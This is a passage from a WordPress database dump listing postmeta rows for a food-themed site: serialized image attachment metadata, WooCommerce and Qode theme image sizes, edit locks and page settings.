0:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Debra-Shine-on.-2-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"Debra-Shine-on.-2-1024x727.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:727;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Debra-Shine-on.-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"Debra-Shine-on.-2-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"Debra-Shine-on.-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"Debra-Shine-on.-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:31:\"Debra-Shine-on.-2-1536x1090.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1090;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"Debra-Shine-on.-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"Debra-Shine-on.-2-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"Debra-Shine-on.-2-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:31:\"Debra-Shine-on.-2-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"Debra-Shine-on.-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"Debra-Shine-on.-2-600x426.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:426;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"Debra-Shine-on.-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12634,2763,'_wp_old_slug','standard-logo'),(12635,2763,'portfolio_single_masonry_image_size',''),(12636,2763,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(12637,2763,'_edit_last','1'),(12638,2763,'_wp_page_template','default'),(12639,3778,'_edit_lock','1586691973:1'),(12640,3403,'_wp_old_slug','landing-slide1-graphic8'),(12641,3403,'_edit_lock','1586692131:1'),(12642,3403,'portfolio_single_masonry_image_size',''),(12643,3403,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(12644,3403,'_edit_last','1'),(12645,3403,'_wp_page_template','default'),(12646,2830,'_wp_old_slug','footer-logo'),(12647,2830,'_edit_lock','1586692311:1'),(12648,2830,'portfolio_single_masonry_image_size',''),(12649,2830,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(12650,2830,'_edit_last','1'),(12651,2830,'_wp_page_template','default'),(12652,2742,'_wp_old_slug','footer-logo-img-1'),(12653,2742,'_edit_lock','1586692373:1'),(12654,2742,'portfolio_single_masonry_image_size',''),(12655,2742,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(12656,2742,'_edit_last','1'),(12657,2742,'_wp_page_template','default'),(12658,2005,'_wp_old_slug','search-logo-1'),(12659,2005,'_edit_lock','1586692557:1'),(12660,2005,'portfolio_single_masonry_image_size',''),(12661,2005,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(12662,2005,'_edit_last','1'),(12663,2005,'_wp_page_template','default'),(12664,4345,'_wp_old_slug','footer-logo-2'),(12665,4345,'_edit_lock','1586692601:1'),(12666,4345,'portfolio_single_masonry_image_size',''),(12667,4345,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(12668,4345,'_edit_last','1'),(12669,4345,'_wp_page_template','default'),(12670,1079,'_wp_old_slug','light-logo'),(12671,1079,'_edit_lock','1586692835:1'),(12672,1079,'portfolio_single_masonry_image_size',''),(12673,1079,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(12674,1079,'_edit_last','1'),(12675,1079,'_wp_page_template','default'),(12676,5046,'_wp_attached_file','2020/04/twitter-icon-e1587088942167.png'),(12677,5046,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:30;s:6:\"height\";i:30;s:4:\"file\";s:39:\"2020/04/twitter-icon-e1587088942167.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12678,5047,'_wp_attached_file','2020/04/Pinterest-icon-e1587089358407.png'),(12679,5047,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:26;s:6:\"height\";i:26;s:4:\"file\";s:41:\"2020/04/Pinterest-icon-e1587089358407.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12680,5048,'_wp_attached_file','2020/04/linked-in-icon-e1587088976227.png'),(12681,5048,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:30;s:6:\"height\";i:30;s:4:\"file\";s:41:\"2020/04/linked-in-icon-e1587088976227.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12682,5049,'_wp_attached_file','2020/04/facebook-icon-e1587088908786.png'),(12683,5049,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:30;s:6:\"height\";i:30;s:4:\"file\";s:40:\"2020/04/facebook-icon-e1587088908786.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12684,5050,'_wp_attached_file','2020/04/facebook-icon-small.png'),(12685,5050,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:30;s:6:\"height\";i:30;s:4:\"file\";s:31:\"2020/04/facebook-icon-small.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12686,5051,'_wp_attached_file','2020/04/linked-in-iconsmall.png'),(12687,5051,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:30;s:6:\"height\";i:30;s:4:\"file\";s:31:\"2020/04/linked-in-iconsmall.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12688,5052,'_wp_attached_file','2020/04/twitter-iconsmall.png'),(12689,5052,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:30;s:6:\"height\";i:30;s:4:\"file\";s:29:\"2020/04/twitter-iconsmall.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12690,5053,'_wp_attached_file','2020/04/Pinterest-iconsmall.png'),(12691,5053,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:30;s:6:\"height\";i:30;s:4:\"file\";s:31:\"2020/04/Pinterest-iconsmall.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(12692,5054,'_edit_lock','1603811126:1'),(12693,5055,'_wp_attached_file','2020/04/orange-landscape-small.jpg'),(12694,5055,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1400;s:6:\"height\";i:897;s:4:\"file\";s:34:\"2020/04/orange-landscape-small.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:34:\"orange-landscape-small-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"orange-landscape-small-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:34:\"orange-landscape-small-600x384.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"orange-landscape-small-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:35:\"orange-landscape-small-1024x656.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:656;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"orange-landscape-small-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"orange-landscape-small-768x492.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:492;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:34:\"orange-landscape-small-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:34:\"orange-landscape-small-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:34:\"orange-landscape-small-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:35:\"orange-landscape-small-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:34:\"orange-landscape-small-550x897.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:35:\"orange-landscape-small-1100x897.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:34:\"orange-landscape-small-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:34:\"orange-landscape-small-600x384.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:34:\"orange-landscape-small-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1552032053\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12695,5056,'_wp_attached_file','2020/04/banana-orange-Noah-small.jpg'),(12696,5056,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1221;s:6:\"height\";i:1500;s:4:\"file\";s:36:\"2020/04/banana-orange-Noah-small.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:36:\"banana-orange-Noah-small-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"banana-orange-Noah-small-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:36:\"banana-orange-Noah-small-600x737.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:737;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"banana-orange-Noah-small-244x300.jpg\";s:5:\"width\";i:244;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"banana-orange-Noah-small-834x1024.jpg\";s:5:\"width\";i:834;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"banana-orange-Noah-small-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"banana-orange-Noah-small-768x943.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:943;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:36:\"banana-orange-Noah-small-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:36:\"banana-orange-Noah-small-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:36:\"banana-orange-Noah-small-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:37:\"banana-orange-Noah-small-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:37:\"banana-orange-Noah-small-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:38:\"banana-orange-Noah-small-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:36:\"banana-orange-Noah-small-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:36:\"banana-orange-Noah-small-600x737.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:737;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"banana-orange-Noah-small-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1552032331\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12699,5054,'_thumbnail_id','5018'),(12700,5054,'_edit_last','1'),(12703,5054,'qodef_page_content_behind_header_meta','no'),(12704,5054,'qodef_boxed_background_image_attachment_meta','fixed'),(12705,5054,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(12706,5054,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(12707,5054,'qodef_video_type_meta','social_networks'),(12708,5054,'qodef_audio_type_meta','social_networks'),(12709,5054,'qodef_post_skin','qodef-post-light-skin'),(12710,5054,'qodef_disable_vertical_header_background_image_meta','no'),(12711,5054,'qodef_disable_header_widget_logo_area_meta','no'),(12712,5054,'qodef_disable_header_widget_menu_area_meta','no'),(12713,5054,'slide_template','default'),(12714,5054,'rs_page_bg_color','#ffffff'),(12719,2142,'_edit_lock','1588134963:1'),(12720,2142,'_edit_last','1'),(12721,2142,'_wp_page_template','default'),(12724,2142,'rs_page_bg_color','#ffffff'),(12725,5059,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(12726,5060,'_edit_lock','1587277778:1'),(12727,5061,'_wp_attached_file','2020/04/pesto-pasta-small.jpg'),(12728,5061,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:959;s:4:\"file\";s:29:\"2020/04/pesto-pasta-small.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"pesto-pasta-small-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"pesto-pasta-small-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"pesto-pasta-small-600x360.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"pesto-pasta-small-300x180.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"pesto-pasta-small-1024x614.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:614;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"pesto-pasta-small-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"pesto-pasta-small-768x460.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:460;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"pesto-pasta-small-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"pesto-pasta-small-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:30:\"pesto-pasta-small-1536x921.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:921;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"pesto-pasta-small-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"pesto-pasta-small-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"pesto-pasta-small-550x959.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:959;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:30:\"pesto-pasta-small-1100x959.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:959;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"pesto-pasta-small-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"pesto-pasta-small-600x360.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"pesto-pasta-small-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1552205477\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12729,5062,'_wp_attached_file','2020/04/MG_2185-scaled.jpg'),(12730,5062,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1784;s:6:\"height\";i:2560;s:4:\"file\";s:26:\"2020/04/MG_2185-scaled.jpg\";s:5:\"sizes\";a:18:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"MG_2185-scaled-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"MG_2185-scaled-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"MG_2185-scaled-600x861.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:861;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"MG_2185-209x300.jpg\";s:5:\"width\";i:209;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"MG_2185-714x1024.jpg\";s:5:\"width\";i:714;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"MG_2185-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"MG_2185-768x1102.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1102;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:19:\"MG_2185-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:19:\"MG_2185-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:21:\"MG_2185-1070x1536.jpg\";s:5:\"width\";i:1070;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:21:\"MG_2185-1427x2048.jpg\";s:5:\"width\";i:1427;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:19:\"MG_2185-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:20:\"MG_2185-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"MG_2185-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:21:\"MG_2185-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:26:\"MG